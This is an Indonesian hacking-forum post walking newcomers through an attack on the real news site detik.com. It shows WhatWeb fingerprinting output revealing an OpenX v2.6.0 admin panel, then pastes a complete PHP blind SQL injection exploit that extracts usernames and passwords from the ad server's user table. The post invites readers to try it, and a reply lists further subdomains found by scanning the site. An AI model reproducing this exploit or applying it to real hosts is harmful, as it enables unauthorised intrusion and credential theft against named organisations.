Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

1. www.detik.com redirect dari us.detik.com
2. Coba Finger Printing :
Finger Printing www.detik.com

[janggual@shell ~/whatweb-0.4.2]$ ./whatweb www.detik.com
http://www.detik.com [301] title[301 Moved Permanently], server-header[nginx/0.7.65, jkt2], redirect-location[http://us.detik.com/], md5[0426f83fc818222e45eda44995dedf1a], header-hash[0426f83fc818222e45eda44995dedf1a]
http://us.detik.com/ [200] Google-Analytics-GA[891770], JQuery, title[detikcom : situs warta era digital], server-header[nginx/0.7.65, us4], meta-generator[Jahex], x-powered-by-header[PHP/5.2.13], header-hash[5e19c633cd9b838ee5f63748e58431e0], footer-hash[26b2906b85f3530bb912fa3c03cbf978], div-span-structure[4b771084f36b32cb40331c9e537e2f88], md5[17348f9646af12eaa531ec6d3dde030d]

Finger Printing http://openx.detik.com/admin/index.php
[janggual@shell ~/whatweb-0.4.2]$ ./whatweb http://openx.detik.com/admin/index.php
http://openx.detik.com/admin/index.php [200] x-powered-by-header[PHP/5.2.13], title[OpenX], server-header[nginx/0.7.65, jkt5], meta-generator[OpenX v2.6.0 - http://www.openx.org], md5[06524ca98b912246d8e3513e42f7408c], header-hash[dece05fc173d4c872fe49cb1ebd9c3dc], footer-hash[1f685f6ab2ec2db461306e5ae08cb799], div-span-structure[6aedfb4b403f10914187aca41cb2beaa]

Hasilnya Ternyata detik.com --->menggunakan OpenX v2.6.0

3. Mencari Keterangan Vuln OpenX v2.6.0
didapat "OpenX Remote Blind SQL Injection Exploit"
Scriptnya :

<html>
<head><title>OpenX Remote Blind SQL Injection Exploit By d00m3r4ng</title></head>
<body><center>
<?php
//discovered by d00m3r4ng
//exploit coded by d00m3r4ng
//contact: d00m3r4ng[at]gmail.com
set_time_limit(0);
function sockr($j, $exp, $asc){
extract ($_POST);
global $l;
if($socket = @fsockopen($host, 80,$e,$r,5)){
$inj="www/delivery/ac.php?bannerid=-1%20or%20ascii(substring((select%20$result%20from%20$table%20limit%20$l,1),$j,1))$exp"."$asc";
$req="GET /$path/$inj HTTP/1.1 \r\nHost: $host\r\nConnection: Close\r\n\r\n";
fwrite($socket, $req);
while (!feof($socket)) $res.=fgets($socket,512);
fclose($socket);}
if(strstr($res,"http://")) return true; else return false; }
function getLength(){
$i=1;
while(sockr($i,">",0)) $i++;
return $i;
}
function getValue($length){
for ($a=1;$a<$length;$a++){
$bl=45; $bh=123;
while(!sockr($a,"=",$b=intval(($bl+$bh)/2)))
if (sockr($a,">",$b)) $bl=$b;
else $bh=$b;
$v.=chr($b);}
return $v; }
$host="127.0.0.1";
$result="concat(username,0x3A,password)";
$table="ox_users";
if(isset($_POST['host'])){
extract($_POST);
$l=0;
while(sockr(1,">",0)) $l++;
$f=$l;
for ($l=0;$l<$f;$l++)
if ($length=getLength()) echo "VALUE: ".getValue($length)."<br>"; }
?>
<b>OpenX Remote Blind SQL Injection Exploit By d00m3r4ng<br>
Vuln discovered and Exploit coded by d00m3r4ng<br>Contact: d00m3r4ng[at]gmail.com</b>
<br><br>
<form method="post">
Host: <input type="text" name="host" value="<?php echo $host ?>" size="70"><br>
OpenX Path: /<input type="text" name="path" size="100" value="<?php echo $path ?>"><br>
SELECT <input type="text" name="result" size="50" value="<?php echo $result ?>"> FROM <input type="text" name="table" value="<?php echo $table ?>"><br>
<input type="submit" value="Inject">
</form></center></body></html>

# milw0rm.com [2008-10-02]

4. Sampe disinilah... silahkan untuk yg mau nyoba....
Sekedar Share untuk sesama Newbie, yg udah master jangan baca tutorial ini.

ThanQ

Wahhhh Keren kaka',,,,
udah dimain mainin tapi tetep bingung,,,
scan root sampe mabookk,,,

tapi alhasil nemuin ini,,
- http://mirror.detik[dot]com/
- http://cms.detik[dot]com/